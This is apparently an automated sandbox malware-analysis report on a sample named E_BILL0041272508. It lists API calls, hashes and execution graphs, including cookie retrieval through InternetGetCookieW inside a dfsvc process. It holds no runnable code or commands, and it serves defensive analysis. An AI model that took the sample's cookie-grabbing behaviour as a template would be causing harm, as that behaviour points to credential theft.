                                                                                                                                                  • Opcode Fuzzy Hash: b223cfdcb8f6297194cb43e773d402063a431434b672bad456d80a4997a2a51e
                                                                                                                                                  • Instruction Fuzzy Hash: EB31A475A04244AFCB21EB99DE80EEEBBFCEF86720F10406AF40597251D6708F41DB91
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009B2594,00000000,?,009C1B50,?,?,?,009B2737,00000004,InitializeCriticalSectionEx,009BBC48,InitializeCriticalSectionEx), ref: 009B25F0
                                                                                                                                                  • GetLastError.KERNEL32(?,009B2594,00000000,?,009C1B50,?,?,?,009B2737,00000004,InitializeCriticalSectionEx,009BBC48,InitializeCriticalSectionEx,00000000,?,009B24C7), ref: 009B25FA
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009B2622
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                  • Opcode ID: 40044f4b298c904bcaf13b047a1376d14c04724a2d179cd8fb1677404e6fa6c8
                                                                                                                                                  • Instruction ID: 781823d8a298f0eadcc15a397ca64b7df56d86e04633d5e2b7d4c1702ca42a68
                                                                                                                                                  • Opcode Fuzzy Hash: 40044f4b298c904bcaf13b047a1376d14c04724a2d179cd8fb1677404e6fa6c8
                                                                                                                                                  • Instruction Fuzzy Hash: A9E04831648308FBDF112BA1EE06FE93F58EB10B71F104421F90DE40E5E7E1D954A544
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009B5784,00000000,00000000,00000000,00000000,?,009B5981,00000006,FlsSetValue), ref: 009B580F
                                                                                                                                                  • GetLastError.KERNEL32(?,009B5784,00000000,00000000,00000000,00000000,?,009B5981,00000006,FlsSetValue,009BC4D8,FlsSetValue,00000000,00000364,?,009B44F6), ref: 009B581B
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009B5784,00000000,00000000,00000000,00000000,?,009B5981,00000006,FlsSetValue,009BC4D8,FlsSetValue,00000000), ref: 009B5829
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                  • Opcode ID: 47b6ca26ff73d184c83b1e834b69fa8bf8a33e3abab1b39245441741e956fb9b
                                                                                                                                                  • Instruction ID: 487d114d90ef4328eaaf57e8e41798832c1d47eb0046bc775836e174dd38bd27
                                                                                                                                                  • Opcode Fuzzy Hash: 47b6ca26ff73d184c83b1e834b69fa8bf8a33e3abab1b39245441741e956fb9b
                                                                                                                                                  • Instruction Fuzzy Hash: C701DB32619726EBC7215B79AE44BA777ACAF057B17220A34FD1AD7180DB64DC00C6E0
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 009B4A27
                                                                                                                                                    • Part of subcall function 009B474D: IsProcessorFeaturePresent.KERNEL32(00000017,009B473C,00000000,?,00000004,00000000,?,?,?,?,009B4749,00000000,00000000,00000000,00000000,00000000), ref: 009B474F
                                                                                                                                                    • Part of subcall function 009B474D: GetCurrentProcess.KERNEL32(C0000417), ref: 009B4771
                                                                                                                                                    • Part of subcall function 009B474D: TerminateProcess.KERNEL32(00000000), ref: 009B4778
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                  • String ID: *?$.
                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                  • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                  • Instruction ID: 43d41496d8d73a32047087028d1a99350f2c27afdb5fd23896547235e6abdf3c
                                                                                                                                                  • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                  • Instruction Fuzzy Hash: E0519375E00219AFDF14CFA8C981AEEB7F9EF98720F244169E454E7342E6359E019B50

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:16.6%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:411
                                                                                                                                                  Total number of Limit Nodes:47
                                                                                                                                                  execution_graph 30853 7ffd347c3d28 30855 7ffd347c3c12 30853->30855 30855->30853 30856 7ffd347c3e38 30855->30856 30857 7ffd34796178 30855->30857 30858 7ffd347c59c0 30857->30858 30861 7ffd347ae8c0 30858->30861 30860 7ffd347c59d4 30860->30855 30863 7ffd347ae8f2 30861->30863 30862 7ffd347aea24 30862->30860 30863->30862 30866 7ffd34794c90 30863->30866 30865 7ffd347aec1f 30867 7ffd34794cb8 30866->30867 30868 7ffd34794cc3 30866->30868 30867->30865 30871 7ffd34793f30 30868->30871 30870 7ffd34794cc8 30870->30865 30874 7ffd347915c8 30871->30874 30873 7ffd34793f55 30873->30870 30875 7ffd347915d1 30874->30875 30876 7ffd34791683 30875->30876 30877 7ffd34791802 LoadLibraryExW 30875->30877 30876->30873 30878 7ffd34791836 30877->30878 30878->30873 31244 7ffd347960c5 31245 7ffd347960b6 31244->31245 31246 7ffd34796118 31244->31246 31246->31245 31248 7ffd34794c90 LoadLibraryExW 31246->31248 31250 7ffd347d2fa7 31246->31250 31248->31250 31249 7ffd347d315f 31251 7ffd347d3084 31250->31251 31252 7ffd347d2ff7 31250->31252 31259 7ffd347d30e0 31250->31259 31253 7ffd347d308a 31251->31253 31251->31259 31255 7ffd347d3167 31252->31255 31263 7ffd347d300c 31252->31263 31254 7ffd34796110 2 API calls 31253->31254 31261 7ffd347d3097 31254->31261 31273 7ffd3479612e LoadLibraryExW 31255->31273 31257 7ffd347d327a 31276 7ffd3479612e LoadLibraryExW 31257->31276 31269 7ffd34796110 31259->31269 31260 7ffd347d329b 31264 7ffd347d309f 31261->31264 31274 7ffd3479612e LoadLibraryExW 31261->31274 31267 7ffd34794c90 LoadLibraryExW 31263->31267 31266 7ffd347d3157 31266->31249 31275 7ffd3479612e LoadLibraryExW 31266->31275 31268 7ffd347d307b 31267->31268 31270 7ffd347d6230 31269->31270 31277 7ffd347d5ee0 31270->31277 31272 7ffd347d6289 31272->31266 31273->31261 31274->31266 31275->31257 31276->31260 31278 7ffd347d7a30 31277->31278 31287 7ffd34791548 31278->31287 31280 7ffd347d7a6e 31292 7ffd347a4ff0 31280->31292 31282 7ffd347d7b25 31283 7ffd34797de0 LoadLibraryExW 31282->31283 31284 7ffd347d7b37 31283->31284 31285 7ffd34794c90 LoadLibraryExW 31284->31285 31286 7ffd347d7b70 31285->31286 31286->31272 31289 7ffd34791551 31287->31289 31288 7ffd34791683 31288->31280 31289->31288 31290 7ffd34791802 LoadLibraryExW 31289->31290 31291 7ffd34791836 31290->31291 31291->31280 31293 7ffd34797de0 LoadLibraryExW 31292->31293 31294 7ffd347a5003 31293->31294 31294->31282 30879 7ffd3479bf29 30880 7ffd3479bf6f 30879->30880 30881 7ffd3479c096 30880->30881 30882 7ffd3479bff6 30880->30882 30885 7ffd34794c90 LoadLibraryExW 30880->30885 30883 7ffd3479c13e 30881->30883 30887 7ffd3479a728 30881->30887 30886 7ffd34794c90 LoadLibraryExW 30882->30886 30885->30882 30886->30881 30888 7ffd3479c720 30887->30888 30897 7ffd347973d0 30888->30897 30890 7ffd3479c75b 30891 7ffd34794c90 LoadLibraryExW 30890->30891 30892 7ffd3479c7b3 30891->30892 30902 7ffd3479a720 30892->30902 30894 7ffd3479c7c4 30895 7ffd34794c90 LoadLibraryExW 30894->30895 30896 7ffd3479c7d2 30894->30896 30895->30896 30896->30881 30898 7ffd347973f6 30897->30898 30899 7ffd347973ff 30897->30899 30898->30890 30900 7ffd34793f30 LoadLibraryExW 30899->30900 30901 7ffd34797404 30900->30901 30901->30890 30903 7ffd3479d360 30902->30903 30904 7ffd3479d470 30903->30904 30906 7ffd3479d3dc 30903->30906 30905 7ffd34794c90 LoadLibraryExW 30904->30905 30910 7ffd3479d459 30905->30910 30907 7ffd34794c90 LoadLibraryExW 30906->30907 30907->30910 30908 7ffd3479d63c 30908->30894 30909 7ffd3479d5eb 30912 7ffd34794c90 LoadLibraryExW 30909->30912 30910->30908 30910->30909 30911 7ffd34794c90 LoadLibraryExW 30910->30911 30911->30909 30912->30908 30937 7ffd3479994b 30938 7ffd34799957 CreateFileW 30937->30938 30940 7ffd34799a8c 30938->30940 31035 7ffd347aae5f 31036 7ffd347aae6f 31035->31036 31037 7ffd347ab23b 31036->31037 31038 7ffd34794c90 LoadLibraryExW 31036->31038 31039 7ffd347ab44a 31038->31039 31130 7ffd3479527d 31131 7ffd3479528b 31130->31131 31132 7ffd347952f3 31131->31132 31135 7ffd34792ef8 LoadLibraryExW 31131->31135 31134 7ffd347952e8 31135->31134 31136 7ffd347a9d9d 31137 7ffd347a9daf 31136->31137 31139 7ffd347a9ddb 31137->31139 31140 7ffd34796160 31137->31140 31142 7ffd34796165 31140->31142 31141 7ffd347961b8 31142->31141 31143 7ffd347ae8c0 LoadLibraryExW 31142->31143 31144 7ffd347c59d4 31143->31144 31144->31139 31145 7ffd347c15a4 31146 7ffd347c15a7 31145->31146 31148 7ffd347c15bc 31145->31148 31147 7ffd347973d0 LoadLibraryExW 31146->31147 31147->31148 31149 7ffd34794c90 LoadLibraryExW 31148->31149 31151 7ffd347c16b2 31149->31151 31150 7ffd347c1a34 31151->31150 31153 7ffd34794c90 LoadLibraryExW 31151->31153 31154 7ffd347c17f0 31151->31154 31152 7ffd34794c90 LoadLibraryExW 31159 7ffd347c18db 31152->31159 31155 7ffd347c17a7 31153->31155 31156 7ffd34794c90 LoadLibraryExW 31154->31156 31158 7ffd347c189e 31154->31158 31155->31154 31157 7ffd34794c90 LoadLibraryExW 31155->31157 31156->31158 31157->31154 31158->31152 31158->31159 30941 7ffd347c1e42 30943 7ffd347c1e8d 30941->30943 30942 7ffd347c207e 30943->30942 30945 7ffd347c1ed2 30943->30945 30970 7ffd347a7720 30943->30970 30945->30942 30946 7ffd347a7720 LoadLibraryExW 30945->30946 30948 7ffd347c1f0d 30945->30948 30946->30948 30947 7ffd347c1f6a 30950 7ffd347a7720 LoadLibraryExW 30947->30950 30954 7ffd347c1f7e 30947->30954 30948->30947 30949 7ffd347c1f45 30948->30949 30951 7ffd347a7720 LoadLibraryExW 30948->30951 30949->30947 30952 7ffd347c1f98 30949->30952 30950->30954 30951->30949 30952->30954 30956 7ffd347a7720 LoadLibraryExW 30952->30956 30953 7ffd34794c90 LoadLibraryExW 30955 7ffd347c2007 30953->30955 30954->30953 30957 7ffd34794c90 LoadLibraryExW 30955->30957 30956->30954 30958 7ffd347c202f 30957->30958 30959 7ffd34794c90 LoadLibraryExW 30958->30959 30960 7ffd347c2062 30959->30960 30960->30942 30961 7ffd347973d0 LoadLibraryExW 30960->30961 30962 7ffd347c2271 30961->30962 30967 7ffd34795990 30962->30967 30964 7ffd347c2296 30965 7ffd34795990 LoadLibraryExW 30964->30965 30966 7ffd347c231b 30965->30966 30968 7ffd34793f30 LoadLibraryExW 30967->30968 30969 7ffd347959b4 30967->30969 30968->30969 30969->30964 30971 7ffd347a7748 30970->30971 30976 7ffd34798fd0 30971->30976 30973 7ffd347a7756 30974 7ffd34796978 LoadLibraryExW 30973->30974 30975 7ffd347a7769 30974->30975 30975->30945 30978 7ffd34798fe7 30976->30978 30979 7ffd34797de0 30976->30979 30980 7ffd34797dfd 30979->30980 30981 7ffd34797e5b 30980->30981 30983 7ffd34796bf0 30980->30983 30981->30978 30984 7ffd34796bf9 30983->30984 31009 7ffd34792f08 30984->31009 30986 7ffd34796c8d 30987 7ffd34796cdb 30986->30987 30988 7ffd34796d2d 30986->30988 30991 7ffd34794c90 LoadLibraryExW 30987->30991 30989 7ffd34796d31 30988->30989 30990 7ffd34796d82 30988->30990 30993 7ffd34794c90 LoadLibraryExW 30989->30993 30992 7ffd34794c90 LoadLibraryExW 30990->30992 30997 7ffd34796cf5 30991->30997 30994 7ffd34796d9f 30992->30994 30993->30997 30995 7ffd34794c90 LoadLibraryExW 30994->30995 30996 7ffd34796db9 30995->30996 30998 7ffd34796f00 30996->30998 31002 7ffd34794c90 LoadLibraryExW 30996->31002 30999 7ffd34794c90 LoadLibraryExW 30997->30999 31005 7ffd34796d28 30997->31005 31000 7ffd34795990 LoadLibraryExW 30998->31000 31003 7ffd34797077 30999->31003 31001 7ffd34796f40 31000->31001 31004 7ffd34794c90 LoadLibraryExW 31001->31004 31002->30998 31006 7ffd34795990 LoadLibraryExW 31003->31006 31004->30997 31005->30981 31007 7ffd347970af 31006->31007 31008 7ffd34794c90 LoadLibraryExW 31007->31008 31008->31005 31011 7ffd34792f0d 31009->31011 31010 7ffd34792f5a 31011->31010 31014 7ffd34792f00 31011->31014 31013 7ffd34795929 31013->30986 31015 7ffd34795990 31014->31015 31016 7ffd347959b4 31015->31016 31017 7ffd34793f30 LoadLibraryExW 31015->31017 31016->31013 31017->31016 31299 7ffd3479a7c3 31301 7ffd347d9e30 31299->31301 31300 7ffd347d9ec5 31301->31300 31303 7ffd347c72b0 31301->31303 31307 7ffd347c72d5 31303->31307 31304 7ffd347c73ed 31304->31301 31306 7ffd347c7363 31306->31304 31310 7ffd3479a778 31306->31310 31307->31306 31308 7ffd347c7405 31307->31308 31314 7ffd34792ef8 LoadLibraryExW 31307->31314 31311 7ffd347c7530 31310->31311 31312 7ffd34794c90 LoadLibraryExW 31311->31312 31313 7ffd347c75ac 31311->31313 31312->31313 31313->31306 31314->31306 31040 7ffd34794b75 31041 7ffd34794b7f 31040->31041 31042 7ffd34793f30 LoadLibraryExW 31041->31042 31043 7ffd34794bad 31042->31043 31160 7ffd347c31b8 31161 7ffd347c31bb 31160->31161 31163 7ffd347c31d0 31160->31163 31162 7ffd347973d0 LoadLibraryExW 31161->31162 31162->31163 31164 7ffd347c326a 31163->31164 31170 7ffd347c3408 31163->31170 31177 7ffd347c33e4 31163->31177 31165 7ffd347973d0 LoadLibraryExW 31164->31165 31166 7ffd347c32df 31165->31166 31178 7ffd3479b540 31166->31178 31168 7ffd347c32fa 31182 7ffd347a8a30 31168->31182 31171 7ffd34794c90 LoadLibraryExW 31170->31171 31173 7ffd347c34ec 31171->31173 31172 7ffd347c3307 31172->31173 31175 7ffd347c3343 31172->31175 31174 7ffd34794c90 LoadLibraryExW 31173->31174 31174->31177 31176 7ffd34794c90 LoadLibraryExW 31175->31176 31175->31177 31176->31177 31179 7ffd3479b565 31178->31179 31180 7ffd347973d0 LoadLibraryExW 31179->31180 31181 7ffd3479b57a 31180->31181 31181->31168 31183 7ffd347a8a5d 31182->31183 31184 7ffd347973d0 LoadLibraryExW 31183->31184 31185 7ffd347a8aa2 31184->31185 31200 7ffd347a8c8c 31185->31200 31208 7ffd347930b8 31185->31208 31187 7ffd347a8b39 31188 7ffd34794c90 LoadLibraryExW 31187->31188 31189 7ffd347a8ba6 31188->31189 31190 7ffd34794c90 LoadLibraryExW 31189->31190 31191 7ffd347a8be2 31190->31191 31213 7ffd347930c0 31191->31213 31193 7ffd347a8be7 31194 7ffd347a8bfd 31193->31194 31195 7ffd347a8bff 31193->31195 31196 7ffd347a8bef 31193->31196 31199 7ffd34794c90 LoadLibraryExW 31194->31199 31223 7ffd34796140 31195->31223 31196->31194 31218 7ffd34796138 31196->31218 31201 7ffd347a8c22 31199->31201 31200->31172 31228 7ffd347930b0 31201->31228 31203 7ffd347a8c27 31204 7ffd347a8c43 31203->31204 31233 7ffd34796128 31203->31233 31206 7ffd34794c90 LoadLibraryExW 31204->31206 31207 7ffd347a8c5d 31206->31207 31207->31172 31210 7ffd347a9010 31208->31210 31209 7ffd347a9063 31209->31187 31210->31209 31240 7ffd34792ef8 LoadLibraryExW 31210->31240 31212 7ffd347a9058 31212->31187 31215 7ffd347a9d40 31213->31215 31214 7ffd347a9d93 31214->31193 31215->31214 31241 7ffd34792ef8 LoadLibraryExW 31215->31241 31217 7ffd347a9d88 31217->31193 31219 7ffd3479612e 31218->31219 31219->31218 31220 7ffd347961b0 31219->31220 31221 7ffd347ae8c0 LoadLibraryExW 31219->31221 31222 7ffd347c59d4 31221->31222 31222->31194 31224 7ffd3479612e 31223->31224 31225 7ffd347961b0 31224->31225 31226 7ffd347ae8c0 LoadLibraryExW 31224->31226 31227 7ffd347c59d4 31226->31227 31227->31194 31230 7ffd347b0ac0 31228->31230 31229 7ffd347b0b13 31229->31203 31230->31229 31242 7ffd34792ef8 LoadLibraryExW 31230->31242 31232 7ffd347b0b08 31232->31203 31234 7ffd347b0b30 31233->31234 31239 7ffd347b0c31 31234->31239 31243 7ffd34792ef8 LoadLibraryExW 31234->31243 31236 7ffd347b0c03 31237 7ffd34794c90 LoadLibraryExW 31236->31237 31238 7ffd347b0c1d 31237->31238 31238->31204 31239->31204 31240->31212 31241->31217 31242->31232 31243->31236 31315 7ffd347942d5 31317 7ffd34794317 31315->31317 31316 7ffd347943f2 31317->31316 31319 7ffd34792ef8 LoadLibraryExW 31317->31319 31319->31316 30913 7ffd34793d36 30914 7ffd34793d3d 30913->30914 30917 7ffd34792e48 30914->30917 30916 7ffd34793e2a 30918 7ffd34793e70 30917->30918 30921 7ffd34792e08 30918->30921 30920 7ffd34793e8a 30920->30916 30922 7ffd34793f30 30921->30922 30923 7ffd347915c8 LoadLibraryExW 30922->30923 30924 7ffd34793f55 30923->30924 30924->30920 31320 7ffd3479a0d5 31321 7ffd3479a0ff 31320->31321 31322 7ffd3479a11a 31321->31322 31323 7ffd347973d0 LoadLibraryExW 31321->31323 31324 7ffd3479a23a 31323->31324 30925 7ffd347ae335 30926 7ffd347ae33f 30925->30926 30929 7ffd34796168 30926->30929 30928 7ffd347ae374 30930 7ffd3479616d 30929->30930 30931 7ffd347ae8c0 LoadLibraryExW 30930->30931 30932 7ffd347c59d4 30931->30932 30932->30928 31018 7ffd3479a850 31019 7ffd3479a882 31018->31019 31020 7ffd347973d0 LoadLibraryExW 31019->31020 31021 7ffd3479a897 31020->31021 31022 7ffd34794c90 LoadLibraryExW 31021->31022 31023 7ffd3479aa63 31022->31023 31024 7ffd3479abd4 31023->31024 31029 7ffd3479aa6e 31023->31029 31025 7ffd34794c90 LoadLibraryExW 31024->31025 31026 7ffd3479ab68 31025->31026 31028 7ffd34794c90 LoadLibraryExW 31026->31028 31027 7ffd3479ab44 31027->31026 31030 7ffd34794c90 LoadLibraryExW 31027->31030 31034 7ffd3479ac08 31028->31034 31029->31027 31031 7ffd3479ab6d 31029->31031 31030->31026 31032 7ffd34794c90 LoadLibraryExW 31031->31032 31033 7ffd3479ab87 31032->31033 30933 7ffd347a1232 30936 7ffd347a12c3 InternetGetCookieW 30933->30936 30935 7ffd347a1429 30936->30935 31048 7ffd347c2471 31049 7ffd347c247b 31048->31049 31050 7ffd347973d0 LoadLibraryExW 31049->31050 31051 7ffd347c24e6 31050->31051 31052 7ffd34794c90 LoadLibraryExW 31051->31052 31053 7ffd347c252e 31052->31053 31054 7ffd347c2dd4 31053->31054 31055 7ffd34795990 LoadLibraryExW 31053->31055 31056 7ffd347c262b 31055->31056 31057 7ffd34794c90 LoadLibraryExW 31056->31057 31058 7ffd347c2645 31057->31058 31059 7ffd34794c90 LoadLibraryExW 31058->31059 31060 7ffd347c2721 31059->31060 31060->31054 31061 7ffd347c273d 31060->31061 31062 7ffd347c277d 31060->31062 31063 7ffd34794c90 LoadLibraryExW 31061->31063 31062->31054 31064 7ffd347a7720 LoadLibraryExW 31062->31064 31065 7ffd347c27b0 31062->31065 31076 7ffd347c2757 31063->31076 31064->31065 31065->31076 31100 7ffd347933d8 31065->31100 31067 7ffd347c27e5 31068 7ffd347933d8 LoadLibraryExW 31067->31068 31067->31076 31069 7ffd347c2833 31068->31069 31070 7ffd34794c90 LoadLibraryExW 31069->31070 31071 7ffd347c285b 31070->31071 31073 7ffd34794c90 LoadLibraryExW 31071->31073 31072 7ffd34794c90 LoadLibraryExW 31077 7ffd347c2943 31072->31077 31074 7ffd347c2875 31073->31074 31075 7ffd347a7720 LoadLibraryExW 31074->31075 31074->31076 31075->31076 31076->31072 31077->31054 31078 7ffd34795990 LoadLibraryExW 31077->31078 31079 7ffd347c29a7 31078->31079 31080 7ffd34794c90 LoadLibraryExW 31079->31080 31081 7ffd347c29c1 31080->31081 31082 7ffd34794c90 LoadLibraryExW 31081->31082 31083 7ffd347c29db 31082->31083 31084 7ffd347c2d96 31083->31084 31088 7ffd347933d0 31083->31088 31086 7ffd347c2a0b 31087 7ffd34795990 LoadLibraryExW 31086->31087 31087->31084 31092 7ffd347933d5 31088->31092 31089 7ffd34793774 31126 7ffd34793c81 31089->31126 31091 7ffd3479378e 31091->31086 31092->31089 31112 7ffd34792f18 31092->31112 31096 7ffd347934cb 31096->31089 31122 7ffd34792f80 31096->31122 31098 7ffd3479370a 31099 7ffd34792f80 LoadLibraryExW 31098->31099 31099->31089 31102 7ffd347933dd 31100->31102 31101 7ffd34793774 31103 7ffd34793c81 LoadLibraryExW 31101->31103 31102->31101 31105 7ffd34792f18 LoadLibraryExW 31102->31105 31104 7ffd3479378e 31103->31104 31104->31067 31106 7ffd347934b6 31105->31106 31107 7ffd34792f68 LoadLibraryExW 31106->31107 31108 7ffd347934cb 31107->31108 31108->31101 31109 7ffd34792f80 LoadLibraryExW 31108->31109 31110 7ffd3479370a 31109->31110 31111 7ffd34792f80 LoadLibraryExW 31110->31111 31111->31101 31113 7ffd34792f1d 31112->31113 31114 7ffd34792f5a 31113->31114 31115 7ffd34792f00 LoadLibraryExW 31113->31115 31116 7ffd347934b6 31115->31116 31117 7ffd34792f68 31116->31117 31118 7ffd34792f6d 31117->31118 31119 7ffd34792f84 31118->31119 31120 7ffd34792f00 LoadLibraryExW 31118->31120 31119->31119 31121 7ffd34795929 31120->31121 31121->31096 31123 7ffd347958a0 31122->31123 31124 7ffd34792f00 LoadLibraryExW 31123->31124 31125 7ffd34795929 31124->31125 31125->31098 31129 7ffd34793cae 31126->31129 31127 7ffd34792e48 LoadLibraryExW 31128 7ffd34793d19 31127->31128 31128->31091 31129->31127

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4005627863.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffd34790000_dfsvc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: aa8bbd70d95d85ea3fbffc0810304ed1fb08098012a4e91ccd84715a95c2cc77
                                                                                                                                                  • Instruction ID: 673269f0297c3d687a0e542f8d5388e36f3e72e799ebf647127992fcd5926ed3
                                                                                                                                                  • Opcode Fuzzy Hash: aa8bbd70d95d85ea3fbffc0810304ed1fb08098012a4e91ccd84715a95c2cc77
                                                                                                                                                  • Instruction Fuzzy Hash: 5EA12BA2B0EA894FF755DB7C44692B93BD1EF57310B4842BBD449D7193DE28E8068381

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1649 7ffd347a1232-7ffd347a12f8 1652 7ffd347a1305-7ffd347a130a 1649->1652 1653 7ffd347a12fa-7ffd347a1302 1649->1653 1654 7ffd347a1317-7ffd347a1323 1652->1654 1655 7ffd347a130c-7ffd347a1314 1652->1655 1653->1652 1656 7ffd347a13a9-7ffd347a13b0 1654->1656 1657 7ffd347a1329-7ffd347a135c 1654->1657 1655->1654 1658 7ffd347a13cb-7ffd347a1427 InternetGetCookieW 1656->1658 1664 7ffd347a135e-7ffd347a1360 1657->1664 1665 7ffd347a13b2-7ffd347a13b8 1657->1665 1659 7ffd347a1429 1658->1659 1660 7ffd347a142f-7ffd347a1442 1658->1660 1659->1660 1662 7ffd347a1467-7ffd347a1499 call 7ffd347a14b5 1660->1662 1663 7ffd347a1444-7ffd347a1466 1660->1663 1676 7ffd347a149b 1662->1676 1677 7ffd347a14a0-7ffd347a14b4 1662->1677 1663->1662 1666 7ffd347a1399-7ffd347a13a7 1664->1666 1667 7ffd347a1362-7ffd347a1374 1664->1667 1672 7ffd347a13ba-7ffd347a13c6 1665->1672 1666->1672 1670 7ffd347a1376 1667->1670 1671 7ffd347a1378-7ffd347a138b 1667->1671 1670->1671 1671->1671 1675 7ffd347a138d-7ffd347a1395 1671->1675 1672->1658 1675->1666 1676->1677
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4005627863.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffd34790000_dfsvc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CookieInternet
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 930238652-0
                                                                                                                                                  • Opcode ID: 0d6e586f09993e0dd4f42821261033a99ed9b4be4d5e2a4795319912731401bf
                                                                                                                                                  • Instruction ID: da4e7045aa25661bce9d015193b271ba1a76c458d7c45f8f412e56f692ec8de3
                                                                                                                                                  • Opcode Fuzzy Hash: 0d6e586f09993e0dd4f42821261033a99ed9b4be4d5e2a4795319912731401bf
                                                                                                                                                  • Instruction Fuzzy Hash: F991B270608B8D8FEBA9DF2888557E53BE1FF59311F04426ED84DC7292CA78A9458B81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1867 7ffd3479994b-7ffd347999e0 1871 7ffd347999ea-7ffd34799a8a CreateFileW 1867->1871 1872 7ffd347999e2-7ffd347999e7 1867->1872 1874 7ffd34799a8c 1871->1874 1875 7ffd34799a92-7ffd34799ac5 1871->1875 1872->1871 1874->1875
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4005627863.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffd34790000_dfsvc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 5d180a76f366a41b9c951cb2573528a0877c06fe5979ec250767370859892cbd
                                                                                                                                                  • Instruction ID: 96dd3ff741f61ab6f9c6d47d00039bc5ee40ab8d29b34e44abb7babe4c53ac14
                                                                                                                                                  • Opcode Fuzzy Hash: 5d180a76f366a41b9c951cb2573528a0877c06fe5979ec250767370859892cbd
